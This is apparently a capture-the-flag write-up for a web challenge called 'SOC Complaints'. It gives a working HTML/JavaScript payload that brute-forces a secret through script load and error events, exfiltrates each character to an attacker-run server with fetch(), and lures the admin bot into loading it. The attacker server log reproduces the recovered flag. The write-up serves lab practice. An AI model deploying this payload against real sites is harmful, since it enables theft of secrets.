Diefunction
Search…
⌃K

SOC Complaints

IPAddress 172.20.0.4 Port 80 URL http://172.20.0.4/

Description

If you cannot access a website, complain to the SOC team then the SOC team will investigate.

Structure

.
├── app.js
├── config
│ └── cors.js
├── controllers
│ ├── complaints.js
│ └── manage.js
├── middlewares
│ └── error.js
├── package.json
├── routes
│ ├── complaints.js
│ └── manage.js
├── utils
│ ├── browser.js
│ └── database.js
└── views

Solution

Exploit

Attacker IPAddress

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:40ff:fe01:c8b5/64 scope link
valid_lft forever preferred_lft forever
IPv4: 172.17.0.1

Start a webserver on docker interface via python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
<head>
<title>EXPLOIT</title>
</head>
<body>
<script>
var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>[email protected][\\]^`{|}~';
var counter = 0;
var secret = '';
probeError = (url) => {
let script = document.createElement('script');
script.src = url;
script.onload = async () => {
secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
await fetch(`http://172.17.0.1/${secret}`);
counter = 0;
probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
};
script.onerror = () => {
counter = counter + 1;
probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
};
document.head.appendChild(script);
}
probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
</script>
</body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -

Explanation